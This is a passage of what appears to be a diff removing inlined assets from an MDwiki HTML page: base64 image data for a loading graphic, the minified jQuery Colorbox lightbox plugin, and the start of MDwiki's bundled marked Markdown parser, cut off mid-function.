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);
-            background-repeat: no-repeat; background-position: center center;}
-</style><!-- END extlib/css/colorbox.css -->
-<!-- START extlib/js/jquery.colorbox.min.js -->
-<script type="text/javascript">(function(a,b,c){function Z(c,d,e){var g=b.createElement(c);return d&&(g.id=f+d),e&&(g.style.cssText=e),a(g)}function $(a){var b=y.length,c=(Q+a)%b;return 0>c?b+c:c}function _(a,b){return Math.round((/%/.test(a)?("x"===b?bb():cb())/100:1)*parseInt(a,10))}function ab(a){return K.photo||/\.(gif|png|jp(e|g|eg)|bmp|ico)((#|\?).*)?$/i.test(a)}function bb(){return c.innerWidth||z.width()}function cb(){return c.innerHeight||z.height()}function db(){var b,c=a.data(P,e);null==c?(K=a.extend({},d),console&&console.log&&console.log("Error: cboxElement missing settings object")):K=a.extend({},c);for(b in K)a.isFunction(K[b])&&"on"!==b.slice(0,2)&&(K[b]=K[b].call(P));K.rel=K.rel||P.rel||a(P).data("rel")||"nofollow",K.href=K.href||a(P).attr("href"),K.title=K.title||P.title,"string"==typeof K.href&&(K.href=a.trim(K.href))}function eb(b,c){a.event.trigger(b),c&&c.call(P)}function fb(){var a,d,e,b=f+"Slideshow_",c="click."+f;K.slideshow&&y[1]?(d=function(){F.text(K.slideshowStop).unbind(c).bind(j,function(){(K.loop||y[Q+1])&&(a=setTimeout(W.next,K.slideshowSpeed))}).bind(i,function(){clearTimeout(a)}).one(c+" "+k,e),r.removeClass(b+"off").addClass(b+"on"),a=setTimeout(W.next,K.slideshowSpeed)},e=function(){clearTimeout(a),F.text(K.slideshowStart).unbind([j,i,k,c].join(" ")).one(c,function(){W.next(),d()}),r.removeClass(b+"on").addClass(b+"off")},K.slideshowAuto?d():e()):r.removeClass(b+"off "+b+"on")}function gb(b){U||(P=b,db(),y=a(P),Q=0,"nofollow"!==K.rel&&(y=a("."+g).filter(function(){var c,b=a.data(this,e);return b&&(c=a(this).data("rel")||b.rel||this.rel),c===K.rel}),Q=y.index(P),-1===Q&&(y=y.add(P),Q=y.length-1)),S||(S=T=!0,r.show(),K.returnFocus&&a(P).blur().one(l,function(){a(this).focus()}),q.css({opacity:+K.opacity,cursor:K.overlayClose?"pointer":"auto"}).show(),K.w=_(K.initialWidth,"x"),K.h=_(K.initialHeight,"y"),W.position(),o&&z.bind("resize."+p+" scroll."+p,function(){q.css({width:bb(),height:cb(),top:z.scrollTop(),left:z.scrollLeft()})}).trigger("resize."+p),eb(h,K.onOpen),J.add(D).hide(),I.html(K.close).show()),W.load(!0))}function hb(){!r&&b.body&&(Y=!1,z=a(c),r=Z(X).attr({id:e,"class":n?f+(o?"IE6":"IE"):""}).hide(),q=Z(X,"Overlay",o?"position:absolute":"").hide(),C=Z(X,"LoadingOverlay").add(Z(X,"LoadingGraphic")),s=Z(X,"Wrapper"),t=Z(X,"Content").append(A=Z(X,"LoadedContent","width:0; height:0; overflow:hidden"),D=Z(X,"Title"),E=Z(X,"Current"),G=Z(X,"Next"),H=Z(X,"Previous"),F=Z(X,"Slideshow").bind(h,fb),I=Z(X,"Close")),s.append(Z(X).append(Z(X,"TopLeft"),u=Z(X,"TopCenter"),Z(X,"TopRight")),Z(X,!1,"clear:left").append(v=Z(X,"MiddleLeft"),t,w=Z(X,"MiddleRight")),Z(X,!1,"clear:left").append(Z(X,"BottomLeft"),x=Z(X,"BottomCenter"),Z(X,"BottomRight"))).find("div div").css({"float":"left"}),B=Z(X,!1,"position:absolute; width:9999px; visibility:hidden; display:none"),J=G.add(H).add(E).add(F),a(b.body).append(q,r.append(s,B)))}function ib(){return r?(Y||(Y=!0,L=u.height()+x.height()+t.outerHeight(!0)-t.height(),M=v.width()+w.width()+t.outerWidth(!0)-t.width(),N=A.outerHeight(!0),O=A.outerWidth(!0),r.css({"padding-bottom":L,"padding-right":M}),G.click(function(){W.next()}),H.click(function(){W.prev()}),I.click(function(){W.close()}),q.click(function(){K.overlayClose&&W.close()}),a(b).bind("keydown."+f,function(a){var b=a.keyCode;S&&K.escKey&&27===b&&(a.preventDefault(),W.close()),S&&K.arrowKey&&y[1]&&(37===b?(a.preventDefault(),H.click()):39===b&&(a.preventDefault(),G.click()))}),a("."+g,b).live("click",function(a){a.which>1||a.shiftKey||a.altKey||a.metaKey||(a.preventDefault(),gb(this))})),!0):!1}var q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,Y,d={transition:"elastic",speed:300,width:!1,initialWidth:"600",innerWidth:!1,maxWidth:!1,height:!1,initialHeight:"450",innerHeight:!1,maxHeight:!1,scalePhotos:!0,scrolling:!0,inline:!1,html:!1,iframe:!1,fastIframe:!0,photo:!1,href:!1,title:!1,rel:!1,opacity:.9,preloading:!0,current:"image {current} of {total}",previous:"previous",next:"next",close:"close",xhrError:"This content failed to load.",imgError:"This image failed to load.",open:!1,returnFocus:!0,reposition:!0,loop:!0,slideshow:!1,slideshowAuto:!0,slideshowSpeed:2500,slideshowStart:"start slideshow",slideshowStop:"stop slideshow",onOpen:!1,onLoad:!1,onComplete:!1,onCleanup:!1,onClosed:!1,overlayClose:!0,escKey:!0,arrowKey:!0,top:!1,bottom:!1,left:!1,right:!1,fixed:!1,data:void 0},e="colorbox",f="cbox",g=f+"Element",h=f+"_open",i=f+"_load",j=f+"_complete",k=f+"_cleanup",l=f+"_closed",m=f+"_purge",n=!a.support.opacity&&!a.support.style,o=n&&!c.XMLHttpRequest,p=f+"_IE6",X="div";a.colorbox||(a(hb),W=a.fn[e]=a[e]=function(b,c){var f=this;if(b=b||{},hb(),ib()){if(!f[0]){if(f.selector)return f;f=a("<a/>"),b.open=!0}c&&(b.onComplete=c),f.each(function(){a.data(this,e,a.extend({},a.data(this,e)||d,b))}).addClass(g),(a.isFunction(b.open)&&b.open.call(f)||b.open)&&gb(f[0])}return f},W.position=function(a,b){function j(a){u[0].style.width=x[0].style.width=t[0].style.width=a.style.width,t[0].style.height=v[0].style.height=w[0].style.height=a.style.height}var c,h,i,d=0,e=0,g=r.offset();z.unbind("resize."+f),r.css({top:-9e4,left:-9e4}),h=z.scrollTop(),i=z.scrollLeft(),K.fixed&&!o?(g.top-=h,g.left-=i,r.css({position:"fixed"})):(d=h,e=i,r.css({position:"absolute"})),e+=K.right!==!1?Math.max(bb()-K.w-O-M-_(K.right,"x"),0):K.left!==!1?_(K.left,"x"):Math.round(Math.max(bb()-K.w-O-M,0)/2),d+=K.bottom!==!1?Math.max(cb()-K.h-N-L-_(K.bottom,"y"),0):K.top!==!1?_(K.top,"y"):Math.round(Math.max(cb()-K.h-N-L,0)/2),r.css({top:g.top,left:g.left}),a=r.width()===K.w+O&&r.height()===K.h+N?0:a||0,s[0].style.width=s[0].style.height="9999px",c={width:K.w+O,height:K.h+N,top:d,left:e},0===a&&r.css(c),r.dequeue().animate(c,{duration:a,complete:function(){j(this),T=!1,s[0].style.width=K.w+O+M+"px",s[0].style.height=K.h+N+L+"px",K.reposition&&setTimeout(function(){z.bind("resize."+f,W.position)},1),b&&b()},step:function(){j(this)}})},W.resize=function(a){S&&(a=a||{},a.width&&(K.w=_(a.width,"x")-O-M),a.innerWidth&&(K.w=_(a.innerWidth,"x")),A.css({width:K.w}),a.height&&(K.h=_(a.height,"y")-N-L),a.innerHeight&&(K.h=_(a.innerHeight,"y")),a.innerHeight||a.height||(A.css({height:"auto"}),K.h=A.height()),A.css({height:K.h}),W.position("none"===K.transition?0:K.speed))},W.prep=function(b){function g(){return K.w=K.w||A.width(),K.w=K.mw&&K.mw<K.w?K.mw:K.w,K.w}function h(){return K.h=K.h||A.height(),K.h=K.mh&&K.mh<K.h?K.mh:K.h,K.h}if(S){var c,d="none"===K.transition?0:K.speed;A.remove(),A=Z(X,"LoadedContent").append(b),A.hide().appendTo(B.show()).css({width:g(),overflow:K.scrolling?"auto":"hidden"}).css({height:h()}).prependTo(t),B.hide(),a(R).css({"float":"none"}),o&&a("select").not(r.find("select")).filter(function(){return"hidden"!==this.style.visibility}).css({visibility:"hidden"}).one(k,function(){this.style.visibility="inherit"}),c=function(){function s(){n&&r[0].style.removeAttribute("filter")}var b,c,h,l,o,p,q,g=y.length,i="frameBorder",k="allowTransparency";if(S){if(l=function(){clearTimeout(V),C.detach().hide(),eb(j,K.onComplete)},n&&R&&A.fadeIn(100),D.html(K.title).add(A).show(),g>1){if("string"==typeof K.current&&E.html(K.current.replace("{current}",Q+1).replace("{total}",g)).show(),G[K.loop||g-1>Q?"show":"hide"]().html(K.next),H[K.loop||Q?"show":"hide"]().html(K.previous),K.slideshow&&F.show(),K.preloading)for(b=[$(-1),$(1)];c=y[b.pop()];)q=a.data(c,e),q&&q.href?(o=q.href,a.isFunction(o)&&(o=o.call(c))):o=c.href,ab(o)&&(p=new Image,p.src=o)}else J.hide();K.iframe?(h=Z("iframe")[0],i in h&&(h[i]=0),k in h&&(h[k]="true"),h.name=f+ +new Date,K.fastIframe?l():a(h).one("load",l),h.src=K.href,K.scrolling||(h.scrolling="no"),a(h).addClass(f+"Iframe").appendTo(A).one(m,function(){h.src="//about:blank"})):l(),"fade"===K.transition?r.fadeTo(d,1,s):s()}},"fade"===K.transition?r.fadeTo(d,0,function(){W.position(0,c)}):W.position(d,c)}},W.load=function(b){var c,d,e=W.prep;T=!0,R=!1,P=y[Q],b||db(),eb(m),eb(i,K.onLoad),K.h=K.height?_(K.height,"y")-N-L:K.innerHeight&&_(K.innerHeight,"y"),K.w=K.width?_(K.width,"x")-O-M:K.innerWidth&&_(K.innerWidth,"x"),K.mw=K.w,K.mh=K.h,K.maxWidth&&(K.mw=_(K.maxWidth,"x")-O-M,K.mw=K.w&&K.w<K.mw?K.w:K.mw),K.maxHeight&&(K.mh=_(K.maxHeight,"y")-N-L,K.mh=K.h&&K.h<K.mh?K.h:K.mh),c=K.href,V=setTimeout(function(){C.show().appendTo(t)},100),K.inline?(Z(X).hide().insertBefore(a(c)[0]).one(m,function(){a(this).replaceWith(A.children())}),e(a(c))):K.iframe?e(" "):K.html?e(K.html):ab(c)?(a(R=new Image).addClass(f+"Photo").error(function(){K.title=!1,e(Z(X,"Error").html(K.imgError))}).load(function(){var a;R.onload=null,K.scalePhotos&&(d=function(){R.height-=R.height*a,R.width-=R.width*a},K.mw&&R.width>K.mw&&(a=(R.width-K.mw)/R.width,d()),K.mh&&R.height>K.mh&&(a=(R.height-K.mh)/R.height,d())),K.h&&(R.style.marginTop=Math.max(K.h-R.height,0)/2+"px"),y[1]&&(K.loop||y[Q+1])&&(R.style.cursor="pointer",R.onclick=function(){W.next()}),n&&(R.style.msInterpolationMode="bicubic"),setTimeout(function(){e(R)},1)}),setTimeout(function(){R.src=c},1)):c&&B.load(c,K.data,function(b,c){e("error"===c?Z(X,"Error").html(K.xhrError):a(this).contents())})},W.next=function(){!T&&y[1]&&(K.loop||y[Q+1])&&(Q=$(1),W.load())},W.prev=function(){!T&&y[1]&&(K.loop||Q)&&(Q=$(-1),W.load())},W.close=function(){S&&!U&&(U=!0,S=!1,eb(k,K.onCleanup),z.unbind("."+f+" ."+p),q.fadeTo(200,0),r.stop().fadeTo(300,0,function(){r.add(q).css({opacity:1,cursor:"auto"}).hide(),eb(m),A.remove(),setTimeout(function(){U=!1,eb(l,K.onClosed)},1)}))},W.remove=function(){a([]).add(r).add(q).remove(),r=null,a("."+g).removeData(e).removeClass(g).die()},W.element=function(){return a(P)},W.settings=d)})(jQuery,document,this);</script>
-<!-- END extlib/js/jquery.colorbox.min.js -->
-<!-- START dist/MDwiki.min.js -->
-<script type="text/javascript">function googlemapsReady(){googlemapsLoadDone.resolve()}(function(){function a(a){this.tokens=[],this.tokens.links={},this.options=a||h.defaults,this.rules=i.normal,this.options.gfm&&(this.rules=this.options.tables?i.tables:i.gfm)}function b(a,b){if(this.options=b||h.defaults,this.links=a,this.rules=j.normal,!this.links)throw new Error("Tokens array requires a `links` property.");this.options.gfm?this.rules=this.options.breaks?j.breaks:j.gfm:this.options.pedantic&&(this.rules=j.pedantic)}function c(a){this.tokens=[],this.token=null,this.options=a||h.defaults}function d(a,b){return a.replace(b?/&/g:/&(?!#?\w+;)/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#39;")}function e(a,b){return a=a.source,b=b||"",function c(d,e){return d?(e=e.source||e,e=e.replace(/(^|[^\[])\^/g,"$1"),a=a.replace(d,e),c):new RegExp(a,b)}}function f(){}function g(a){for(var b,c,d=1;d<arguments.length;d++){b=arguments[d];for(c in b)Object.prototype.hasOwnProperty.call(b,c)&&(a[c]=b[c])}return a}function h(b,e,f){if(f||"function"==typeof e){f||(f=e,e=null),e&&(e=g({},h.defaults,e));var i=a.lex(i,e),j=e.highlight,k=0,l=i.length,m=0;if(!j||j.length<3)return f(null,c.parse(i,e));for(var n=function(){delete e.highlight;var a=c.parse(i,e);return e.highlight=j,f(null,a)};l>m;m++)!function(a){return"code"===a.type?(k++,j(a.text,a.lang,function(b,c){return null==c||c===a.text?--k||n():(a.text=c,a.escaped=!0,void(--k||n()))})):void 0}(i[m])}else try{return e&&(e=g({},h.defaults,e)),c.parse(a.lex(b,e),e)}catch(o){if(o.message+="\nPlease report this to https://github.com/chjj/marked.",(e||h.defaults).silent)return"<p>An error occured:</p><pre>"+d(o.message+"",!0)+"</pre>";throw o}}var i={newline:/^\n+/,code:/^( {4}[^\n]+\n*)+/,fences:f,hr:/^( *[-*_]){3,} *(?:\n+|$)/,heading:/^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)/,nptable:f,lheading:/^([^\n]+)\n *(=|-){3,} *\n*/,blockquote:/^( *>[^\n]+(\n[^\n]+)*\n*)+/,list:/^( *)(bull) [\s\S]+?(?:hr|\n{2,}(?! )(?!\1bull )\n*|\s*$)/,html:/^ *(?:comment|closed|closing) *(?:\n{2,}|\s*$)/,def:/^ *\[([^\]]+)\]: *<?([^\s>]+)>?(?: +["(]([^\n]+)[")])? *(?:\n+|$)/,table:f,paragraph:/^((?:[^\n]+\n?(?!hr|heading|lheading|blockquote|tag|def))+)\n*/,text:/^[^\n]+/};i.bullet=/(?:[*+-]|\d+\.)/,i.item=/^( *)(bull) [^\n]*(?:\n(?!\1bull )[^\n]*)*/,i.item=e(i.item,"gm")(/bull/g,i.bullet)(),i.list=e(i.list)(/bull/g,i.bullet)("hr",/\n+(?=(?: *[-*_]){3,} *(?:\n+|$))/)(),i._tag="(?!(?:a|em|strong|small|s|cite|q|dfn|abbr|data|time|code|var|samp|kbd|sub|sup|i|b|u|mark|ruby|rt|rp|bdi|bdo|span|br|wbr|ins|del|img)\\b)\\w+(?!:/|@)\\b",i.html=e(i.html)("comment",/<!--[\s\S]*?-->/)("closed",/<(tag)[\s\S]+?<\/\1>/)("closing",/<tag(?:"[^"]*"|'[^']*'|[^'">])*?>/)(/tag/g,i._tag)(),i.paragraph=e(i.paragraph)("hr",i.hr)("heading",i.heading)("lheading",i.lheading)("blockquote",i.blockquote)("tag","<"+i._tag)("def",i.def)(),i.normal=g({},i),i.gfm=g({},i.normal,{fences:/^ *(`{3,}|~{3,}) *(\S+)? *\n([\s\S]+?)\s*\1 *(?:\n+|$)/,paragraph:/^/}),i.gfm.paragraph=e(i.paragraph)("(?!","(?!"+i.gfm.fences.source.replace("\\1","\\2")+"|")(),i.tables=g({},i.gfm,{nptable:/^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/,table:/^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*/}),a.rules=i,a.lex=function(b,c){var d=new a(c);return d.lex(b)},a.prototype.lex=function(a){return a=a.replace(/\r\n|\r/g,"\n").replace(/\t/g,"    ").replace(/\u00a0/g," ").replace(/\u2424/g,"\n"),this.token(a,!0)},a.prototype.token=function(a,b){for(var c,d,e,f,g,h,j,k,l,a=a.replace(/^ +$/gm,"");a;)if((e=this.rules.newline.exec(a))&&(a=a.substring(e[0].length),e[0].length>1&&this.tokens.push({type:"space"})),e=this.rules.code.exec(a))a=a.substring(e[0].length),e=e[0].replace(/^ {4}/gm,""),this.tokens.push({type:"code",text:this.options.pedantic?e:e.replace(/\n+$/,"")});else if(e=this.rules.fences.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"code",lang:e[2],text:e[3]});else if(e=this.rules.heading.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"heading",depth:e[1].length,text:e[2]});else if(b&&(e=this.rules.nptable.exec(a))){for(a=a.substring(e[0].length),h={type:"table",header:e[1].replace(/^ *| *\| *$/g,"").split(/ *\| */),align:e[2].replace(/^ *|\| *$/g,"").split(/ *\| */),cells:e[3].replace(/\n$/,"").split("\n")},k=0;k<h.align.length;k++)h.align[k]=/^ *-+: *$/.test(h.align[k])?"right":/^ *:-+: *$/.test(h.align[k])?"center":/^ *:-+ *$/.test(h.align[k])?"left":null;for(k=0;k<h.cells.length;k++)h.cells[k]=h.cells[k].split(/ *\| */);this.tokens.push(h)}else if(e=this.rules.lheading.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"heading",depth:"="===e[2]?1:2,text:e[1]});else if(e=this.rules.hr.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"hr"});else if(e=this.rules.blockquote.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"blockquote_start"}),e=e[0].replace(/^ *> ?/gm,""),this.token(e,b),this.tokens.push({type:"blockquote_end"});else if(e=this.rules.list.exec(a)){for(a=a.substring(e[0].length),f=e[2],this.tokens.push({type:"list_start",ordered:f.length>1}),e=e[0].match(this.rules.item),c=!1,l=e.length,k=0;l>k;k++)h=e[k],j=h.length,h=h.replace(/^ *([*+-]|\d+\.) +/,""),~h.indexOf("\n ")&&(j-=h.length,h=this.options.pedantic?h.replace(/^ {1,4}/gm,""):h.replace(new RegExp("^ {1,"+j+"}","gm"),"")),this.options.smartLists&&k!==l-1&&(g=i.bullet.exec(e[k+1])[0],f===g||f.length>1&&g.length>1||(a=e.slice(k+1).join("\n")+a,k=l-1)),d=c||/\n\n(?!\s*$)/.test(h),k!==l-1&&(c="\n"===h[h.length-1],d||(d=c)),this.tokens.push({type:d?"loose_item_start":"list_item_start"}),this.token(h,!1),this.tokens.push({type:"list_item_end"});this.tokens.push({type:"list_end"})}else if(e=this.rules.html.exec(a))a=a.substring(e[0].length),this.tokens.push({type:this.options.sanitize?"paragraph":"html",pre:"pre"===e[1]||"script"===e[1],text:e[0]});else if(b&&(e=this.rules.def.exec(a)))a=a.substring(e[0].length),this.tokens.links[e[1].toLowerCase()]={href:e[2],title:e[3]};else if(b&&(e=this.rules.table.exec(a))){for(a=a.substring(e[0].length),h={type:"table",header:e[1].replace(/^ *| *\| *$/g,"").split(/ *\| */),align:e[2].replace(/^ *|\| *$/g,"").split(/ *\| */),cells:e[3].replace(/(?: *\| *)?\n$/,"").split("\n")},k=0;k<h.align.length;k++)h.align[k]=/^ *-+: *$/.test(h.align[k])?"right":/^ *:-+: *$/.test(h.align[k])?"center":/^ *:-+ *$/.test(h.align[k])?"left":null;for(k=0;k<h.cells.length;k++)h.cells[k]=h.cells[k].replace(/^ *\| *| *\| *$/g,"").split(/ *\| */);this.tokens.push(h)}else if(b&&(e=this.rules.paragraph.exec(a)))a=a.substring(e[0].length),this.tokens.push({type:"paragraph",text:"\n"===e[1][e[1].length-1]?e[1].slice(0,-1):e[1]});else if(e=this.rules.text.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"text",text:e[0]});else if(a)throw new Error("Infinite loop on byte: "+a.charCodeAt(0));return this.tokens};var j={escape:/^\\([\\`*{}\[\]()#+\-.!_>])/,autolink:/^<([^ >]+(@|:\/)[^ >]+)>/,url:f,tag:/^<!--[\s\S]*?-->|^<\/?\w+(?:"[^"]*"|'[^']*'|[^'">])*?>/,link:/^!?\[(inside)\]\(href\)/,reflink:/^!?\[(inside)\]\s*\[([^\]]*)\]/,nolink:/^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]/,strong:/^__([\s\S]+?)__(?!_)|^\*\*([\s\S]+?)\*\*(?!\*)/,em:/^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/,code:/^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/,br:/^ {2,}\n(?!\s*$)/,del:f,text:/^[\s\S]+?(?=[\\<!\[_*`]| {2,}\n|$)/};j._inside=/(?:\[[^\]]*\]|[^\]]|\](?=[^\[]*\]))*/,j._href=/\s*<?(.*?)>?(?:\s+['"]([\s\S]*?)['"])?\s*/,j.link=e(j.link)("inside",j._inside)("href",j._href)(),j.reflink=e(j.reflink)("inside",j._inside)(),j.normal=g({},j),j.pedantic=g({},j.normal,{strong:/^__(?=\S)([\s\S]*?\S)__(?!_)|^\*\*(?=\S)([\s\S]*?\S)\*\*(?!\*)/,em:/^_(?=\S)([\s\S]*?\S)_(?!_)|^\*(?=\S)([\s\S]*?\S)\*(?!\*)/}),j.gfm=g({},j.normal,{escape:e(j.escape)("])","~|])")(),url:/^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])/,del:/^~~(?=\S)([\s\S]*?\S)~~/,text:e(j.text)("]|","~]|")("|","|https?://|")()}),j.breaks=g({},j.gfm,{br:e(j.br)("{2,}","*")(),text:e(j.gfm.text)("{2,}","*")()}),b.rules=j,b.output=function(a,c,d){var e=new b(c,d);return e.output(a)},b.prototype.output=function(a){for(var b,c,e,f,g="";a;)if(f=this.rules.escape.exec(a))a=a.substring(f[0].length),g+=f[1];else if(f=this.rules.autolink.exec(a))a=a.substring(f[0].length),"@"===f[2]?(c=this.mangle(":"===f[1][6]?f[1].substring(7):f[1]),e=this.mangle("mailto:")+c):(c=d(f[1]),e=c),g+='<a href="'+e+'">'+c+"</a>";else if(f=this.rules.url.exec(a))a=a.substring(f[0].length),c=d(f[1]),e=c,g+='<a href="'+e+'">'+c+"</a>";else if(f=this.rules.tag.exec(a))a=a.substring(f[0].length),g+=this.options.sanitize?d(f[0]):f[0];else if(f=this.rules.link.exec(a))a=a.substring(f[0].length),g+=this.outputLink(f,{href:f[2],title:f[3]});else if((f=this.rules.reflink.exec(a))||(f=this.rules.nolink.exec(a))){if(a=a.substring(f[0].length),b=(f[2]||f[1]).replace(/\s+/g," "),b=this.links[b.toLowerCase()],!b||!b.href){g+=f[0][0],a=f[0].substring(1)+a;continue}g+=this.outputLink(f,b)}else if(f=this.rules.strong.exec(a))a=a.substring(f[0].length),g+="<strong>"+this.output(f[2]||f[1])+"</strong>";else if(f=this.rules.em.exec(a))a=a.substring(f[0].length),g+="<em>"+this.output(f[2]||f[1])+"</em>";else if(f=this.rules.code.exec(a))a=a.substring(f[0].length),g+="<code>"+d(f[2],!0)+"</code>";else if(f=this.rules.br.exec(a))a=a.substring(f[0].length),g+="<br>";else if(f=this.rules.del.exec(a))a=a.substring(f[0].length),g+="<del>"+this.output(f[1])+"</del>";else if(f=this.rules.text.exec(a))a=a.substring(f[0].length),g+=d(f[0]);else if(a)throw new Error("Infinite loop on byte: "+a.charCodeAt(0));return g},b.prototype.outputLink=function(a,b){return"!"!==a[0][0]?'<a href="'+d(b.href)+'"'+(b.title?' title="'+d(b.title)+'"':"")+">"+this.output(a[1])+"</a>":'<img src="'+d(b.href)+'" alt="'+d(a[1])+'"'+(b.title?' title="'+d(b.title)+'"':"")+">"},b.prototype.smartypants=function(a){return this.options.smartypants?a.replace(/--/g,"—").replace(/'([^']*)'/g,"‘$1’").replace(/"([^"]*)"/g,"“$1”").replace(/\.{3}/g,"…"):a},b.prototype.mangle=function(a){for(var b,c="",d=a.length,e=0;d>e;e++)b=a.charCodeAt(e),Math.random()>.5&&(b="x"+b.toString(16)),c+="&#"+b+";";return c},c.parse=function(a,b){var d=new c(b);return d.parse(a)},c.prototype.parse=function(a){this.inline=new b(a.links,this.options),this.tokens=a.reverse();for(var c="";this.next();)c+=this.tok();return c},c.prototype.next=function(){return this.token=this.tokens.pop()},c.prototype.peek=function(){return this.tokens[this.tokens.length-1]||0},c.prototype.parseText=function(){for(var a=this.token.text;"text"===this.peek().type;)a+="\n"+this.next().text;return this.inline.output(a)},c.prototype.tok=function(){switch(this.token.type){case"space":return"";case"hr":return"<hr>\n";case"heading":return"<h"+this.token.depth+">"+this.inline.output(this.token.text)+"</h"+this.token.depth+">\n";case"code":if(this.options.highlight){var a=this.options.highlight(this.token.text,this.token.lang);null!=a&&a!==this.token.text&&(this.token.escaped=!0,this.token.text=a)}return this.token.escaped||(this.token.text=d(this.token.text,!0)),"<pre><code"+(this.token.lang?' class="'+this.options.langPrefix+this.token.lang+'"':"")+">"+this.token.text+"</code></pre>\n";case"table":var b,c,e,f,g,h="";for(h+="<thead>\n<tr>\n",c=0;c<this.token.header.length;c++)b=this.inline.output(this.token.header[c]),h+=this.token.align[c]?'<th align="'+this.token.align[c]+'">'+b+"</th>\n":"<th>"+b+"</th>\n";for(h+="</tr>\n</thead>\n",h+="<tbody>\n",c=0;c<this.token.cells.length;c++){for(e=this.token.cells[c],h+="<tr>\n",g=0;g<e.length;g++)f=this.inline.output(e[g]),h+=this.token.align[g]?'<td align="'+this.token.align[g]+'">'+f+"</td>\n":"<td>"+f+"</td>\n";h+="</tr>\n"}return h+="</tbody>\n","<table>\n"+h+"</table>\n";case"blockquote_start":for(var h="";"blockquote_end"!==this.next().type;)h+=this.tok();return"<blockquote>\n"+h+"</blockquote>\n";case"list_start":for(var i=this.token.ordered?"ol":"ul",h="";"list_end"!==this.next().type;)h+=this.tok();return"<"+i+">\n"+h+"</"+i+">\n";case"list_item_start":for(var 